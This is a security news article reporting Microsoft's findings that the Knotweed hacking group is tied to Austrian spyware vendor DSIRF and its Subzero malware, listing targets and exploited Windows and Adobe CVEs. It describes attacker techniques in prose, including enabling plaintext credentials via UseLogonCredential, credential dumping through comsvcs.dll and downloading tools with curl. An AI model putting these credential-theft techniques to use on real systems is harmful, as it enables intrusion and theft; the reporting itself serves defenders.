Microsoft has been told that the Knotweed hack group is linked to the Austrian spyware vendor DSIRF, which also often acts as a cyber mercenary. Researchers have determined that Knotweed is attacking European and Central American organizations using the Subzero malware toolkit.
Let me remind you that we also wrote that Experts linked BlackCat (ALPHV) ransomware to BlackMatter and DarkSide groups, and also that Evil Corp Ransomware Posing As PayloadBin Group To Avoid US Sanctions.
On the official website, DSIRF advertises itself as a company that is engaged in analytics, cyber forensics, and intelligence related to data. However, Microsoft associates this company with the Subzero malware, which DSIRF clients can use to hack their phones, computers, network devices, and so on.
Earlier, while studying the Knotweed attacks, the information security company RiskIQ also discovered that the infrastructure serving malware since February 2020 may be associated with DSIRF, including the official website and domains of the company, which were probably used to debug and prepare Subzero for work.
Now, Microsoft Threat Intelligence Center (MSTIC) analysts are writing about multiple links between DSIRF and the malicious tools used in Knotweed attacks. In particular, we are talking about the C&C infrastructure used by malware; a DSIRF-linked GitHub account that was used in one of the attacks; a code signing certificate that was issued by DSIRF and used to sign the exploit; and other posts that linked Subzero directly to DSIRF.
Microsoft has studied some of the Knotweed attacks and discovered that they have targeted law firms, banks, and consulting organizations around the world, including Austria, the UK, and Panama.
On compromised devices, the attackers deployed Corelump, the main payload that ran from memory to avoid detection, as well as Jumplump, a heavily obfuscated loader that downloaded and loaded Corelump into memory.
The main Subzero payload has many features, including keystroke interception, screen capture, data theft, as well as launching remote shells and arbitrary plugins downloaded from the control server.
On compromised systems where Knotweed deployed its malware, Microsoft has observed various consequences of the breach, including:
- setting UseLogonCredential to “1” to enable plain text credentials;
- collection of credentials through comsvcs.dll;
- attempting to access emails with a credential dump from a Knotweed IP address;
- using Curl to download Knotweed tools from file shares, including vultrobjects[.]com;
- running PowerShell scripts directly from GitHub and an account associated with DSIRF.
Among the 0-day vulnerabilities that Knotweed used in its campaigns, Microsoft highlights the recently fixed issue CVE-2022-22047, which helped attackers to elevate privileges, leave the sandbox and achieve system-level code execution.
In addition, last year Knotweed used an exploit chain consisting of two Windows privilege escalation vulnerabilities (CVE-2021-31199 and CVE-2021-31201) in combination with an exploit for an Adobe Reader vulnerability (CVE-2021-28550). All these bugs were fixed in June 2021.
Also in 2021, the group was associated with the exploitation of the fourth 0-day vulnerability that was privilege escalation in the Windows Update Medic Service (CVE-2021-36948). This bug was used to force the loading of an arbitrary signed DLL.